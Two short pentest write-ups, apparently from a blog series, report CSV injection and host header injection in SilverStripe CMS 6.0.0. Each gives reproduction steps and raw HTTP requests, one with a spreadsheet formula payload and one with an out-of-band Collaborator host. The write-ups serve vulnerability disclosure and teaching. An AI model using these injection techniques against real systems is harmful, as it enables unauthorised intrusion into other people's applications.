Friday Fun Pentest Series - 40 - CSV Injection - silverstripecmsv6.0.0

Description

- It was noted that the application was vulnerable to CSV Injection in the "Users" functionality

CSV Injection #1:

Steps to Reproduce:

1. Login and visit "Security" > "Add Member" > "First Name" and enter payload of =30*30
2. Then visit "Reports" > "Users, Groups and Permissions" > "Export as CSV"
3. Payload would render upon opening the CSV file

// HTTP POST Request

POST /admin/security/users/EditForm/field/users/item/new/ItemEditForm HTTP/1.1
Host: demo.silverstripe.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36
[...]
FirstName=%3D30*30&Surname=test&Email=test%40example.com&Password%5B_Password%5D=&Password%5B_ConfirmPassword%5D=&Locale=en_US&FailedLoginCount=&SecurityID=8f151871365766eb90355f98c745a93ae8f5205c&action_doSave=1&BackURL=https%3A%2F%2Fdemo.silverstripe.org%2Fadmin%2Fsecurity


// HTTP Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 16 Aug 2025 17:02:00 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 0
Connection: keep-alive
x-status: Saved%20Member%20%22test%2C%20%3D30%2A30%22%20successfully.
x-controllerurl: admin/security/users/EditForm/field/users/item/510
x-pjax: CurrentForm,Breadcrumbs,ValidationResult
x-controller: SilverStripe\Admin\SecurityAdmin
x-title: Silverstripe+-+Security
x-frame-options: SAMEORIGIN
vary: X-Requested-With
[...]

Friday Fun Pentest Series - 39 - Host Header Injection - silverstripecmsv6.0.0

 Description

- It was noted that the application was vulnerable to Host Header Injection in the login page

Host Header Injection #1:

Steps to Reproduce:

1. Login and change the Host header to Burp Collab domain
2. Upon logging in the Collab would get a hit from the IP of the app

// HTTP Post Request

POST /Security/login/default/LoginForm HTTP/1.1

Host: 7ksb89bppmbvc3po6ma6x72n7ed51wtki.oastify.com

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:142.0) Gecko/20100101 Firefox/142.0

[...]

AuthenticationMethod=SilverStripe%5CSecurity%5CMemberAuthenticator%5CMemberAuthenticator&Email=admin&Password=password&SecurityID=5afbb1fab346375510939ba7b65499e556b0251c&action_doLogin=Log+in

// HTTP Response

HTTP/1.1 503 Service Unavailable

Content-Type: text/html

Cache-Control: no-cache, no-store

[...]

<html style="height:100%"><head><META NAME="ROBOTS" CONTENT="NOINDEX, NOFOLLOW"><meta name="format-detection" content="telephone=no"><meta name="viewport" content="initial-scale=1.0"><meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"></head><body style="margin:0px;height:100%"><iframe id="main-iframe" src="/_Incapsula_Resource?CWUDNSAI=27&xinfo=1014-115438578-0%200NNN%20RT%281755353110306%2067%29%20q%280%20-1%20-1%20-1%29%20r%284%20-1%29&incident_id=0-468567604813498382&edet=22&cinfo=ffffffff&rpinfo=0&mth=POST" frameborder=0 width="100%" height="100%" marginheight="0px" marginwidth="0px">Request unsuccessful. Incapsula incident ID: 0-468567604813498382</iframe></body></html>

// Burp Collab domain hit

The Collaborator server received a DNS lookup of type CNAME for the domain name www.7ksb89bppmbvc3po6ma6x72n7ed51wtki.oastify.com.  

The lookup was received from IP address 149.126.76.44:7396 at 2025-Aug-16 14:05:10.562 UTC.